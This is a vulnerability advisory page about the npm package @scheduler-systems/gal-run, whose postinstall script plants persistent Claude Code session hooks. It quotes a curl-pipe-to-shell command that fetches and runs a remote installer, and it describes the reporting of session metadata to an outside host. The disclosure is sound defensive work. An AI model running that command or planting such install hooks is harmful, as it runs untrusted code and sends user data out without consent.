VDB

GCVE-110-OSM-2026-1256

GCVE-110-OSM-2026-1256
Advisory PublishedCVSS 8.8/10
Vulnetix · Advisory published April 1, 2026
Installs persistent hooks into Claude Code's ~/.claude/settings.json during postinstall that execute on every session start and end without user consent. The SessionStart hook runs curl -fsSL https://gal.run/install.sh | sh -s -- --force if the gal binary is absent, enabling arbitrary code execution from attacker-controlled infrastructure on every Claude Code session. The Stop hook reports session duration and organization name to gal.run on every session end. scripts/postinstall.cjs writes two hook scripts to ~/.claude/hooks/ (gal-sync-reminder.js and gal-usage-report.js) and registers them as SessionStart and Stop hooks in ~/.claude/settings.json. The SessionStart hook embeds repairBrokenBinary() which pipes gal.run/install.sh through shell if the gal binary is not found on PATH. The Stop hook executes 'gal report-usage' with session duration and org metadata. Hooks survive package uninstall unless the gal binary is also removed.

Weaknesses (CWE)

CWE-506Embedded Malicious Code

Risk Scores

CVSS 3.1
8.8/10
High · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Affected Products

VendorProductVersionsPlatforms
unknown@scheduler-systems/gal-run* (affected)

Browse GCVE Records

73,118 records in the GCVE database · Updated July 16, 2026

No matching records found.

Explore Further

Investigate this vulnerability in the interactive console or download the raw GCVE record.

$ Console Community · 100/wk Open console ›